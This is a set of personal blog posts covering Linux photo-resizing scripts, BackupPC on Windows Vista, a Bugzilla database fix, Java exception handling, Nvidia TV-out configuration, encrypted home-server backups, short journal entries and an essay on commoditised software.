opted to create landscape images of 800x600 with a black background for all the
portrait photos. I later discovered that you can on this frame change the
background colour as follows: Main menu > Slideshow > Background colour > White
/ Black Grey.
The process I have used is a little specific to my setup and needs, but
hopefully will give you a good starting point. I have created 3 bash scripts
that call each other to orchestrate the conversion from my raw photo collection
to a new set suitable for the frame, which in turn make use of imageMagick and
exiftran to do the work.
I found out about [imageMagick](http://www.imagemagick.org/) through searching,
and tutorials such as [HowTo - Batch Image Resize on
Linux](http://www.smokinglinux.com/tutorials/howto-batch-image-resize-on-linux).
The version packaged with Ubuntu 7.10 is quite old, so I ended up building and
installing the latest version (6.3.7) from source to get all the functionality
I needed.
`exiftran` is a nifty utility that reads the exif orientation information in a
photo, losslessly rotates the photo to match and then updates the exif data. It
is closely related to `jpegtran`.
My folder structure in my home folder (so the scripts make sense):
* scripts (for bash scripts)
* photos (originals)
* 2005
* 2005-12-31 event name
* etc
* 2006
* etc
* photos_frame (for the modified and shrunk photos which will be copied onto the flash card)
So without further ado, here's the scripts:
**frame.sh** - runs the processing scripts on each year folder of interest
#!/bin/bash -v
~/scripts/frame_photo_folder.sh 2005 ~/photos_frame/
~/scripts/frame_photo_folder.sh 2006 ~/photos_frame/
~/scripts/frame_photo_folder.sh 2007 ~/photos_frame/
**frame_photo_folder.sh** - runs the processing script on subfolder of the year
#!/bin/bash
#arg 1 = input folder
#arg 2 = output folder
INPUTPATH=$1
OUTPATH=$2
cd $INPUTPATH
if [ ! -d "$OUTPATH$INPUTPATH" ]
then
echo creating output folder \"$OUTPATH$INPUTPATH\"
mkdir $OUTPATH$INPUTPATH
fi
for fname in *
do
if [ -d "$fname" ]
then
if [ ! -d "$OUTPATH$INPUTPATH/$fname" ]
then
echo creating output folder \"$OUTPATH$INPUTPATH/$fname\"
mkdir "$OUTPATH$INPUTPATH/$fname"
fi
echo searching for jpg files in \"$fname\"
cd "$fname"
find . -maxdepth 1 -type f -name \*.JPG | xargs -iimgfile ~/scripts/frame_photo.sh "imgfile" "$OUTPATH$INPUTPATH/$fname"
cd ..
fi
done
**frame_photo.sh**
* creates output folder(s)
* copies original photo into output folder
* uses exiftran to rotate the photo to the correct orientation
* shrinks the photo to a maximum of 800x600, and fills any remaining space with a black background
```
#!/bin/bash
#arg 1 = photo file name
#arg 2 = where to put result
#resizes and pads suitable for a photo frame.
INPUTFILE=$1
OUTPATH=$2
#pwd
echo copying \"$INPUTFILE\" into \"$OUTPATH\"
cp "$INPUTFILE" "$OUTPATH"
cd "$OUTPATH"
#pwd
#echo processing \"$INPUTFILE\"
exiftran -ai "$INPUTFILE"
convert "$INPUTFILE" -resize '800x600>' -background black -gravity center -extent 800x600 "$INPUTFILE"
```
I timed the whole operation using the time command, and copied all output to a
log file as follows.
$ time ./frame.sh 2>&1 | tee frame.log
The conversion of around 6000 photos took around one and a half hours.
The concept of redirection of stdout & stderr was neatly explained by the
article [CLI magic: need redirection?](http://www.linux.com/articles/113686),
so now I know that 2>&1 means redirect output number two into output number one,
in other words redirect stderr into stdout, which then allows you to pipe the
whole lot into something else like "tee" (No, not tea, though it may be
interesting redirecting my photos into my tea...)
Add a comment or drop me a line if you find it interesting or useful or if you
have any questions or criticisms.
Update: I've worked this script into a small python gui app, check it out at
[http://github.com/timabell/photo-frame-prep](http://github.com/timabell/photo-frame-prep)
<file_sep>---
title: "i still hate sundays"
date: 2005-07-03
slashdot_url: https://slashdot.org/journal/110984/i-still-hate-sundays
---
<p>having worked another six day week, I discover that I now can't do anything I had to do on my day off. Namely involving post office for ebay (shut), barclays for a new account (shut) and registering at the health centre (open 9-5 mon-fri, which is no frickin good at all). piss. guess I'll just go buy shoes at the oracle cos that's all that's open. maybe I'll try to move my hours to work sunday. not.</p>
<file_sep>---
title: "email security / lack of"
date: 2005-01-25
slashdot_url: https://slashdot.org/journal/96534/email-security--lack-of
---
<p>I will soon start digitally signing my email for reasons similar to this:<br><a href="http://www.linuxmafia.com/~rick/linux-info/rant-gpg">http://www.linuxmafia.com/~rick/linux-info/rant-gpg</a><br>If it bothers you then I may send you copies of the included rant. And if you don't like it then you will lose your right to complain when someone sends email spoofed from your address<nobr> </nobr>:-)</p>
<p>If you want a good alarm clock / hifi I can recommend my latest <a href="http://cgi.ebay.co.uk/ws/eBayISAPI.dll?ViewItem&rd=1&item=5746472812&ssPageName=STRK:MESE:IT">eBay listing</a>.</p>
<p>Tim</p>
<p>PS.</p>
<p>Grrrrrrrrrrr.</p>
<file_sep>---
title: "Hello reader"
date: 2003-10-15
slashdot_url: https://slashdot.org/journal/49186/hello-reader
---
<p>I found out what my mysterious payment from egg was this evening.<br>Cashback is now paid straight into current account (I like!)<br>so I am 28 quid richer for spending all my money through egg.<br>woo!<br>I think that's way more than I earnt in interest on my savings.</p>
<p>TMF bunch would be proud of me.</p>
<file_sep>---
layout: post
title: backuppc and windows vista
date: '2009-10-23T01:51:00.005Z'
author: <NAME>
tags:
- howto
- backup
- vista
- windows
- linux
- wip
modified_time: '2009-10-24T22:29:34.727Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1285384210635406754
blogger_orig_url: https://timwise.blogspot.com/2009/10/backuppc-and-windows-vista.html
---
Steps I took to get a [backuppc](http://backuppc.sourceforge.net/) server on an
ubuntu 8.10 pc in order to be able to back up a windows vista business pc. I've
only documented the non-obvious and undocumented items here.
* Added a user called backup to the vista pc.
* Added the backup user to the "administrators" group. I tried the "backup
operators" group but it didn't give access to the user profiles. It looks
like robocopy has some black magic that allows it to bypass ACLs when a
member of backup operators.
* Enabled admin shares (ie `\\machine\C$`) by adding `DWORD` registry key
`LocalAccountTokenFilterPolicy` to
`HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System`
and setting the value to `1`. See [How to access Administrative Shares on
Vista
(C$)](http://www.paulspoerry.com/2007/05/09/how-to-access-administrative-shares-on-vista-c/)
by PaulSpoerry
* Removed the `-N` from the `SmbClientFullCmd` etc options in backuppc's
transfer (`xfer`) settings as it didn't seem to be using the provided
password. Troubleshooting was aided by running
`/usr/share/backuppc/bin/BackupPC_dump -v -f vistamachine` directly as user
backuppc.
* [Hide the backup
user](http://forums.techarena.in/vista-administration/689162.htm#post2788050)
from the welcome screen by adding `DWORD`
`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\backup` with value `0`
to the registry. "backup" is the name of the user to hide, `0` means hide,
`1` means show.
Enjoy.
See also:
* [ubuntu backuppc/vista
guide](https://help.ubuntu.com/community/BackupPC/smb)
Current status: This has only been partially successful so far. The backup runs
but has lots of files missing due to access-denied errors on many of the important
folders. It looks like I will have to manually give "backup operators"
permissions to these folders. Sigh. Vista is proving to be less than easy for
me to support.
<file_sep>---
layout: post
title: Java checked and runtime exceptions and how to transition
date: '2013-04-02T21:25:00.000Z'
author: <NAME>
tags:
modified_time: '2013-04-02T21:37:03.810Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2601004754756824237
blogger_orig_url: https://timwise.blogspot.com/2013/04/java-checked-and-runtime-exceptions-and.html
---
As primarily a C# programmer I've never been sold on checked exceptions, mostly seeing them as an unnecessary nuisance forcing programmers to introduce reams of boilerplate `throws` / `try-catch` blocks into their consuming code to propagate these exceptions up the stack.
Whilst coding on [https://github.com/timabell/FreeTTS](https://github.com/timabell/FreeTTS) I was forced to deal with this personal demon.
I've read that checked exceptions are a way of making exceptions be part of the declared API for some class or library, and that it forces client programmers to handle error conditions that the API programmer knows are likely to occur (e.g. the library relies on the filesystem internally so declares it throws an `IOException` when calling a relevant method).
I have some sympathy with this idea and can see how it can allow for more robust code when done well. My experience has generally been that it is not handled well and the reaction is to add a lot of meaningless code or to throw away the exception and hide the problem, causing difficulties troubleshooting later.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/8278346178"><img
src="https://live.staticflickr.com/8337/8278346178_3bcf551666.jpg" alt="Photo of fungus on a tree"></a>
</div>
When I've been in control of the API I've been tempted to always throw runtime exceptions and avoid the problem entirely, however this time whilst working on someone else's class I came across a call to an external library that threw an `IOException` which I couldn't change. This made me think a bit harder about the problem. I initially thought my options were to immediately catch and rethrow as a runtime exception or to add `throws IOException` / `throws Exception` to every piece of the call chain.
I tried the latter approach of propagating the `throws` up through many layers, which although messy did work; right up until I hit a call within a `toString()` method, which is defined by `Object` and doesn't allow you to change the API of the method (by adding a checked exception).
Incidentally I think that having `toString()` rely on code that could throw a file system exception like this did is a dodgy design, but that wasn't my code and would have been a large rewrite.
So after a bit of grumbling to myself I looked more closely at the fault line between the checked exception being thrown and the rest of the codebase.
The existing code was just ignoring the error with `catch {}` (shudder) and returning `null`, making it hard to troubleshoot a failing JUnit test.
I think the answer to the conundrum is that for each method in the chain you have to decide if callers of the method could usefully handle the error condition, or whether they could add any useful information to the stack trace to assist troubleshooting. Here's roughly the approach I've taken which I think should be illustrative:
Method that throws
String getSomething(string filename) throws IOException
{
// do some file IO
return someData;
}
Next method up. Doesn't compile as checked exception not handled, what to do?
String loadFoo()
{
String foo = getSomething("this.txt");
return foo;
}
In this case I don't think `getSomething` should be the last point in the chain as it doesn't know _why_ it was performing the operation it was. `loadFoo` however knows both the resource being accessed and what the intent was, so can report an exception message that should point someone troubleshooting immediately to the source of the problem and inform them what the program was trying to achieve. Having `loadFoo()` declare that it `throws IOException` doesn't make sense as the caller shouldn't need to know how `loadFoo` gets its data, it's just the kind of noise that programmers dislike Java for. So the answer in my opinion is because `loadFoo()` is best placed to give all the useful information needed to fix the problem, it should catch the checked exception, wrap it in a runtime exception, add a useful message and rethrow it. This saves callers from needing to handle exceptions that they can't usefully deal with, whilst still providing good troubleshooting information. And yet there's still a use for the checked exceptions as `getSomething()` was able to declare that it knew an `IOException` was possible but that it wasn't in a position to give enough useful information.
So the final code I ended up with looked something like this:
String getSomething(string filename) throws IOException
{
// do some file IO
return someData;
}
String loadFoo()
{
String filename = "this.txt";
try
{
String foo = getSomething(filename);
return foo;
} catch (IOException ex) {
throw new RuntimeException("Failed to read foo from '" + filename + "'", ex);
}
}
## Inversion of control (IoC)
A colleague of mine mentioned IoC as a problem for checked exceptions. This is an interesting point and does complicate things.
## References
* [http://stackoverflow.com/questions/613954/the-case-against-checked-exceptions](http://stackoverflow.com/questions/613954/the-case-against-checked-exceptions)
* [http://stackoverflow.com/questions/27578/when-to-choose-checked-and-unchecked-exceptions](http://stackoverflow.com/questions/27578/when-to-choose-checked-and-unchecked-exceptions)
* [http://stackoverflow.com/questions/1656376/why-are-runtime-exceptions-unchecked-in-java](http://stackoverflow.com/questions/1656376/why-are-runtime-exceptions-unchecked-in-java)
* [http://stackoverflow.com/questions/4639432/checked-vs-unchecked-exception?rq=1](http://stackoverflow.com/questions/4639432/checked-vs-unchecked-exception?rq=1)
* [http://stackoverflow.com/questions/3613422/exception-handling-in-java?rq=1](http://stackoverflow.com/questions/3613422/exception-handling-in-java?rq=1)
* [http://docs.oracle.com/javase/tutorial/essential/exceptions/runtime.html](http://docs.oracle.com/javase/tutorial/essential/exceptions/runtime.html)
<file_sep>---
title: "tim's new blog"
date: 2007-01-07
slashdot_url: https://slashdot.org/journal/158640/tims-new-blog
---
<p>Seeing as blogging has reached the masses I'm going to start writing in a normal blog.<br>I will no longer write in here most likely.</p>
<p>the new url is currently <a href="http://timwise.dyndns.org/">http://timwise.dyndns.org/</a> but we'll see how that goes.</p>
<p>Tim</p>
<file_sep>---
title: "sailing pics"
date: 2006-07-09
slashdot_url: https://slashdot.org/journal/139362/sailing-pics
---
<p><a href="http://timwise.co.uk/photos/sailing06/">http://timwise.co.uk/photos/sailing06/</a></p>
<file_sep>---
layout: post
title: Connecting to smb shares on a domain in gnome
date: '2012-06-11T18:17:00.001Z'
author: <NAME>
tags:
modified_time: '2012-06-11T18:17:38.462Z'
thumbnail: http://2.bp.blogspot.com/-I3lG1lD4ue4/T9Y1-P89FHI/AAAAAAAAAGc/4q0gUYZYccc/s72-c/smb-domain.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-909906901858651246
blogger_orig_url: https://timwise.blogspot.com/2012/06/connecting-to-smb-shares-on-domain-in.html
---
The domain name has to be UPPERCASE otherwise authentication fails.
Majorly confusing.
Time lost: 3 hours.

Sigh
<file_sep>---
layout: post
title: bugzilla upgrades and user tokens
date: '2009-11-08T18:12:00.006Z'
author: <NAME>
tags:
- mysql
- bugzilla
- troubleshooting
- sys admin
modified_time: '2009-11-10T22:28:00.731Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1315274421552207269
blogger_orig_url: https://timwise.blogspot.com/2009/11/bugzilla-upgrades-and-user-tokens.html
---
It's bugzilla upgrade time for my private install, and I have for the second time run into a strange issue with the tokens system. Since this is the second time and I know how to fix it, here it is for the record.
I have upgraded from v3.0.4 to 3.4.3.
Once the site was up again, saving the site parameters (`editparams.cgi`) showed a big red warning:
> It looks like you didn't come from the right page (you have no valid token
> for the *edit_parameters* action while processing the 'editparams.cgi'
> script). The reason could be one of:
>
> * You clicked the "Back" button of your web browser after having
> successfully submitted changes, which is generally not a good idea (but
> harmless).
> * You entered the URL in the address bar of your web browser directly,
> which should be safe.
> * You clicked on a URL which redirected you here **without your consent**,
> in which case this action is much more critical.
>
> Are you sure you want to commit these changes anyway? This may result in
> unexpected and undesired results.
>
> [Confirm Changes]
>
> Or throw away these changes and go back to editparams.cgi.
Pushing the button doesn't work (same page shows again).
After much digging last time I discovered that the tokens it refers to are stored in table bugs.tokens, and that the size of the field is wrong in my installation after the upgrade (again).
```
mysql> use bugs;
mysql> describe tokens;
+-----------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| userid | mediumint(9) | YES | MUL | NULL | |
| issuedate | datetime | NO | | NULL | |
| <span style="font-weight: bold;">token | varchar(5)</span> | NO | PRI | NULL | |
| tokentype | varchar(8) | YES | | NULL | |
| eventdata | tinytext | YES | | NULL | |
+-----------+--------------+------+-----+---------+-------+
5 rows in set (0.02 sec)
```
According to the published schema, token should be `varchar(16)`. [http://www.ravenbrook.com/project/p4dti/tool/cgi/bugzilla-schema/index.cgi?action=single&version=3.4.2&view=View+schema#table-tokens](http://www.ravenbrook.com/project/p4dti/tool/cgi/bugzilla-schema/index.cgi?action=single&version=3.4.2&view=View+schema#table-tokens)
To fix the problem I modified the data type as follows:
```
mysql> alter table tokens modify column token varchar(16) not null;
Query OK, 20 rows affected (0.32 sec)
Records: 20 Duplicates: 0 Warnings: 0
```
And then I was able to change my parameters.
[https://bugzilla.mozilla.org/show_bug.cgi?id=527780](https://bugzilla.mozilla.org/show_bug.cgi?id=527780)
<file_sep>---
layout: post
title: Enabling TV-Out on Ubuntu Linux 7.10 on a Dell Inspiron 8500
date: '2007-12-09T01:41:00.001Z'
author: <NAME>
tags:
- howto
- nvidia
- inspiron 8500
- ubuntu
- hardware
- composite video
- linux
- dell
- laptop
- proprietary
- oss
modified_time: '2007-12-09T03:13:46.284Z'
thumbnail: http://farm3.static.flickr.com/2419/2096850378_d98545fdc9_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8211898069521983285
blogger_orig_url: https://timwise.blogspot.com/2007/12/enabling-tv-out-on-ubuntu-linux-710-on.html
---
This weekend, I finally got the tv-out working under linux (Ubuntu 7.10 aka
gusty gibbon) on my laptop. Here's what was involved, including some of the
(time consuming) red herrings involved in getting this set up.
[](http://www.flickr.com/photos/tim_abell/2096850378/)
I've included the full `xorg.conf` files for normal display and tv output at
the end of this post.
I used the composite video output as that's what I have cables for. I haven't
ever tried the s-video output, and I haven't tried the digital audio output
since I divorced microsoft windows and threw her things out into the rain a
couple of years ago.
The quality is pretty poor, but good enough. I think there's a limit of 800x600
for the video out. I'm getting a fair amount of interference on both the video
and audio when the laptop is on mains and connected to my amplifier / tv. I'm
not sure what the cause is but it's not bad enough to be unusable.
I installed the nvidia proprietary (that's a negative word in case you don't
live in my world) drivers some time ago in order to get 3D acceleration, and I
think this is a prerequisite to running the tv-out.
In my initial investigation I came across
[nvoption](http://www.sorgonet.com/linux/nvoption/), which in theory allows you
to turn on the tv-out on the nvidia cards. I did manage to compile and run it
after several hours of trial, error and finding build dependencies but when I
finally got it built and running I found that it would seg fault when I hit the
"apply" button, hurrah! In the process of playing with nvoption however, I
noticed the [nv-online](http://www.sorgonet.com/linux/nv-online/) page that
this person has very generously set up. Reading this it dawned on me that
nvoption purely modifies the /etc/X11/xorg.conf file, and that I don't actually
*need* the tool to get tv-out running. I had originally presumed (the brother
of all ...) that the nvoption tool did some magical proprietary prodding of the
graphics card directly. After a bit of searching to find out where the options
should go (the device section), I was then able to use the [documentation of
options](http://www.sorgonet.com/linux/nv-online/help.html) in the second frame
of the nv-online page to configure my own X. After a bit of experimenting with
different options and lots of restarting of the X server (ctrl+alt+backspace) I
was able to get the desired result of the display mirrored/cloned on both the
lcd and the television.
I tried the nvidia-settings gui tool that comes with the proprietary drivers,
but it was no use for this task. This tool modifies the xorg.conf file. It did
help me recently with a normal dual screen setup (using a crt monitor plugged
into the vga port on the laptop), but it was no help for the tv-out, which was
not even mentioned in the interface.
There is a tool called displayconfig-gtk which is fairly new to Ubuntu that
allows you to save named display profiles for different configurations
(including dual screen, though it didn't quite behave for me). It can be found
under System > Administration > Screens and Graphics. This stores an xorg.conf
file for each profile in /var/lib/displayconfig-gtk/locations/, and an index
file in /var/lib/displayconfig-gtk/locations.conf. This is almost ideal, as I
have created a set of xorg.conf files for my various setups, however it doesn't
seem to cope with applying these custom xorg files. Additionally nvidia seem to
have a weird way of setting the screen to run at its native resolution of
1920x1600, and this tool doesn't cope with it. This was corrected by selecting
the right resolution under System > Preferences > Screen Resolution.
Sadly it looks like there are no tools for easy switching X configuration
files, so the process for now involves manually copying the config files.
I've created multiple files in /etc/X11, one for each set up including
xorg.conf_lcd and xorg.conf_tv. The switching process is then something along
the lines of "cd /etc/X11/", "sudo cp xorg.conf_tv xorg.conf",
ctrl+alt+backspace (restart x server).
If it's any consolation I recall the process in windows involved starting from
scratch in a distinctly non-intuitive gui and trying to get a whole load of
settings just right, so being able to save the settings is a big step up. I
think it took similar amounts of time to get tv-out running under windoze. I
guess that's the price we pay for allowing companies to deny us access to the
hardware specs so it can be integrated properly. I bought this laptop before I
knew how much control I was giving away, and I endeavour not to make such
mistakes these days.
The "designed for windows xp" sticker has been moved to the equally shiny
microwave oven which brings me a small piece of joy when I make porridge in the
morning.
# xorg.conf for just the laptop screen
```
# nvidia-settings: X configuration file generated by nvidia-settings
# nvidia-settings: version 1.0 (buildmeister@builder3) Mon Apr 16 20:38:05 PDT 2007
Section "ServerLayout"
Identifier "Layout0"
Screen 0 "Screen0" 0 0
InputDevice "Keyboard0" "CoreKeyboard"
InputDevice "Mouse0" "CorePointer"
Inputdevice "Synaptics Touchpad"
EndSection
Section "Files"
RgbPath "/usr/X11R6/lib/X11/rgb"
EndSection
Section "Module"
Load "dbe"
Load "extmod"
Load "type1"
Load "freetype"
Load "glx"
EndSection
Section "ServerFlags"
Option "Xinerama" "0"
EndSection
Section "InputDevice"
# generated from default
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/psaux"
Option "Emulate3Buttons" "no"
Option "ZAxisMapping" "4 5"
EndSection
Section "InputDevice"
Identifier "Synaptics Touchpad"
Driver "synaptics"
Option "SendCoreEvents" "true"
Option "Device" "/dev/psaux"
Option "Protocol" "auto-dev"
Option "HorizScrollDelta" "0"
EndSection
Section "InputDevice"
# generated from default
Identifier "Keyboard0"
Driver "kbd"
EndSection
Section "Monitor"
# HorizSync source: edid, VertRefresh source: edid
Identifier "Monitor0"
VendorName "Unknown"
ModelName "Sharp"
HorizSync 30.0 - 75.0
VertRefresh 60.0
Option "DPMS"
EndSection
Section "Device"
Identifier "Videocard0"
Driver "nvidia"
VendorName "NVIDIA Corporation"
BoardName "GeForce4 4200 Go"
EndSection
Section "Screen"
Identifier "Screen0"
Device "Videocard0"
Monitor "Monitor0"
DefaultDepth 24
Option "metamodes" "DFP: nvidia-auto-select +0+0"
SubSection "Display"
Depth 24
Modes "1600x1200" "1280x1024" "1024x768" "800x600" "640x480"
EndSubSection
EndSection
```
# xorg.conf for running the tv-out at 800x600, with the laptop displaying the same
```
# nvidia-settings: X configuration file generated by nvidia-settings
# nvidia-settings: version 1.0 (buildmeister@builder3) Mon Apr 16 20:38:05 PDT 2007
Section "ServerLayout"
Identifier "Layout0"
Screen 0 "Screen0" 0 0
InputDevice "Keyboard0" "CoreKeyboard"
InputDevice "Mouse0" "CorePointer"
Inputdevice "Synaptics Touchpad"
EndSection
Section "Files"
RgbPath "/usr/X11R6/lib/X11/rgb"
EndSection
Section "Module"
Load "dbe"
Load "extmod"
Load "type1"
Load "freetype"
Load "glx"
EndSection
Section "ServerFlags"
Option "Xinerama" "0"
EndSection
Section "InputDevice"
# generated from default
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/psaux"
Option "Emulate3Buttons" "no"
Option "ZAxisMapping" "4 5"
EndSection
Section "InputDevice"
Identifier "Synaptics Touchpad"
Driver "synaptics"
Option "SendCoreEvents" "true"
Option "Device" "/dev/psaux"
Option "Protocol" "auto-dev"
Option "HorizScrollDelta" "0"
EndSection
Section "InputDevice"
# generated from default
Identifier "Keyboard0"
Driver "kbd"
EndSection
Section "Monitor"
# HorizSync source: edid, VertRefresh source: edid
Identifier "Monitor0"
VendorName "Unknown"
ModelName "Sharp"
HorizSync 30.0 - 75.0
VertRefresh 60.0
Option "DPMS"
EndSection
Section "Device"
Identifier "Videocard0"
Driver "nvidia"
VendorName "NVIDIA Corporation"
BoardName "GeForce4 4200 Go"
**Option "TwinView" "1"
Option "TwinViewOrientation" "Clone"
Option "MetaModes" "800x600, 800x600;"
Option "TVStandard" "PAL-I"
Option "ConnectedMonitor" "DFP,TV"**
EndSection
Section "Screen"
Identifier "Screen0"
Device "Videocard0"
Monitor "Monitor0"
DefaultDepth 24
#Option "metamodes" "DFP: nvidia-auto-select +0+0"
SubSection "Display"
Depth 24
Modes "1600x1200" "1280x1024" "1024x768" "800x600" "640x480"
EndSubSection
EndSection
```
<file_sep>---
permalink: /represent
redirect_to: https://timabell.github.io/right-to-represent/
---
<file_sep>---
layout: post
title: Home server backups
date: 2017-08-29 20:31:08.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/08/29/home-server-backups/"
---
The setup
* Ubuntu server domU xen host
* Ubuntu server xen VM with LUKS full disk encryption
* docker-compose
* syncthing with built-in "Staggered File Versioning"
Plan
* Plug in usb external hdd, with full disk encryption (i.e. a LUKS partition taking up almost all the space, plus a little fat32 with a text file in case anyone finds it and wants to return it).
* Use LUKS key chaining to be able to unlock the disk without entering a password
* Use autofs to automatically mount/unmount so that it's safe to unplug when a backup isn't running.
* Use rsync to push all the files from the syncthing data directory onto the usb disk.
Somehow need to make the disk accessible to the VM.
Finding the luks partition when plugged into the host:
```
tim@spot:~$ sudo fdisk -l
...
Disk /dev/sdc: 931.5 GiB, 1000170586112 bytes, 1953458176 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x6380ad37
Device Boot Start End Sectors Size Id Type
/dev/sdc1 63 21579 21517 10.5M c W95 FAT32 (LBA)
**/dev/sdc2 21580 1953147527 1953125948 931.3G 83 Linux**
tim@spot:~$ ll /dev/disk/by-uuid/
...
lrwxrwxrwx 1 root root 10 Aug 29 21:51 **6ca09b72-8c9b-4571-8943-9f1d520671ab -> ../../sdc2**
```
Confirm it's the luks partition:
```
tim@spot:~$ sudo cryptsetup luksDump /dev/disk/by-uuid/6ca09b72-8c9b-4571-8943-9f1d520671ab
LUKS header information for /dev/disk/by-uuid/6ca09b72-8c9b-4571-8943-9f1d520671abVersion: 1
Cipher name: aes
Cipher mode: xts-plain64
Hash spec: sha1
...
```
I'll update this post with any details as I progress. Don't hold your breath though!
<file_sep>---
layout: post
title: mini police eye in the sky
date: '2009-04-11T16:26:00.001Z'
author: <NAME>
tags:
- ideas
modified_time: '2009-04-11T16:26:32.840Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8997739866191843988
blogger_orig_url: https://timwise.blogspot.com/2009/04/mini-police-eye-in-sky.html
---
Just a quick note on an idea that's been bothering me.
How about a mini semi autonomous police surveillance helicopter?
It would be cheaper than a real helicopter, but still offers many of the advantages of having an eye in the sky that can go direct to the scene without contending with traffic etc.
Something like an electric model helicopter with 2+ blades for stability, with a petrol generator for longer run times.
Electronics and gyros to make it naturally stable, and a gps & altimeter for auto navigation.
Carrying a payload of normal and infrared cameras for information gathering.
Transmitting a live video feed over long range radio, and offering long distance control, so it could be controlled centrally by an operator.
I reckon these could be produced for a few thousand pounds each and provide excellent assistance to the force.
<file_sep>---
title: "The Wall"
date: 2004-06-12
slashdot_url: https://slashdot.org/journal/74212/the-wall
---
<p>Mountain biking exploits<br><a href="http://www.t.abell.dsl.pipex.com/photos/wales_20040610/">here</a></p>
<file_sep>---
title: "marketing? grrrrrrr! oh, and greenbelt this weekend"
date: 2005-08-22
slashdot_url: https://slashdot.org/journal/115092/marketing-grrrrrrr-oh-and-greenbelt-this-weekend
---
<p>My mobile just rang.<br>No signal as usual so couldn't hear anything.<br>Looked up the <a href="http://www2.bt.com/localarea">area code</a>, was for Swansea. Ah, thinks me. might be tom. Tried to phone back, piece of crap phone promptly crashed. Turn it on again, swear at the "Vodafone - How are you" greeting (How am I? Pissed off cos the phone crashed, duh. That's the only time I ever see that message). Tried again, only to find it's not tom<nobr> </nobr>:( but some marketing company. Ugh. Cue registration on the <a href="http://www.tpsonline.org.uk/tps/">Telephone Preference Service</a>, and a pissy journal entry.<nobr> </nobr>:)</p>
<p>In other news, plan is to do a day trip to <a href="http://www.greenbelt.org.uk/">greenbelt</a> on the saturday. All welcome.</p>
<file_sep>---
layout: post
title: Why SDV could be a billion dollar business
date: 2017-11-17 23:10:48.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '11558131858'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/11/17/why-sdv-could-be-a-billion-dollar-business/"
---
Okay maybe a billion is a long shot, but I read the Hiten Shah article on [how Trello could have been a $1B business](https://producthabits.com/why-trello-failed-to-build-a-1-billion-business/) (via [startup chat](https://thestartupchat.com/ep258/)) and was surprised to discover there are lessons for how I can turn [Sql Data Viewer](https://sqldataviewer.com/) into a sustainable business.
What trello and SDV have in common:
* Mass (horizontal) appeal
* Easily copied
* Difficult to sell premium versions of the general purpose product ("stickers" anyone?)
I was going to just sell SDV for £100 and be done with it, but this article showed me a better way.
1. Give the general purpose tool away for free (as Trello does)
2. Collect contact information in exchange for the value provided by the free tool.
3. Use the contact list to have conversations with businesses that use it in order to...
4. Find out how integrating tightly with their business could provide real value over and above the general purpose tool.
5. Build vertical-specific integrations, stickyness & marketing.
6. Profit! (No underpants required. Or gnomes.)
What do you think? Drop me a line: [<EMAIL>](mailto:<EMAIL>)
<file_sep>---
title: The death of custom software development
layout: post
---
I've been around this industry for a long time and have been quietly observing the bigger trends while I fiddle around with the details of software.
Here's what I've noticed: writing software by hand is doomed. Except that it isn't, and it's a bit more nuanced than that.
I think the industrial revolution and the creation and growth of engineering as a profession is a good way to think about the progression of the software profession in the large.
## The long view - the birth of payroll software
A few years ago I decided to get a bit stronger (being your typically feeble software engineer at the time) and joined a Nuffield gym and took them up on their personal training options so that I wouldn't injure myself picking up the first 1kg weight I found in the gym. The PT I got happened to be a lovely older chap named Bryan, who is a very calm and experienced trainer who really helped me build some useful real-world strength through the medium of increasingly heavy kettle-bells and other such devices, all without injury. Now obviously we got talking as we spent many hours on turning me into a proper human, and it turns out that Bryan used to work for the mighty HP (the computer company not the sauce) of all things, and was part of the software world for many years before I joined it amidst the dot-com mania. I have heard talk of people writing custom payroll systems in the past, but Bryan actually lived it and it was great hearing the stories. In many ways nothing much has changed; software engineers write custom software to solve some pressing business problem for the big businesses that can afford it, and everyone else gets by with bits of paper or whatever they can pull together. The software engineers complain about the hardware engineers, the hardware engineers complain about the software engineers, the sales people sell things that are expensive to do and the software engineers grumble and try and make good. There are fascinating stories of obscure bugs where you have to drill all the way down to the compiler or hardware to find the true source; the stuff of coder legends. All this was true then and is true now.
"That's all very well", you say, but what's that got to do with me? Well I think some of the systems Bryan worked on are illustrative of the geological shifts in software over the years, and are indicative of changes happening to this day and still to come.
In that era, there was no good off-the-shelf payroll software that could solve every business's payroll needs, and every business needs to pay its staff. Doing it by hand is laborious and error prone which makes it a good candidate for turning into software. The in-house custom coding crowd got there first and made it work for big businesses that could afford development teams or the equivalent consultancy fees. Then vendors started to show up but there were edges that they couldn't handle so there was still room for custom code, and now it would be [almost] madness to start a payroll software company (though you might find a way to disrupt the existing players like Sage, but it's not going to be all green fields for the taking like it was back then).
## The trend of commoditization and the shrinking need for custom code
"So what", you say, "there's still vast plains of untouched lands for software development, coding will never die! Coders unite!"
As the really big universal problems are picked off one by one there is indeed still plenty of room, for now at least, for custom code.
(By big universal problems I mean things like: accounting, payroll, Enterprise Resource Planning aka ERP, development tooling, website creation, online payments, social media, buying and selling privately online, car-sharing, short-term property rentals, travel bookings, etc. etc.)
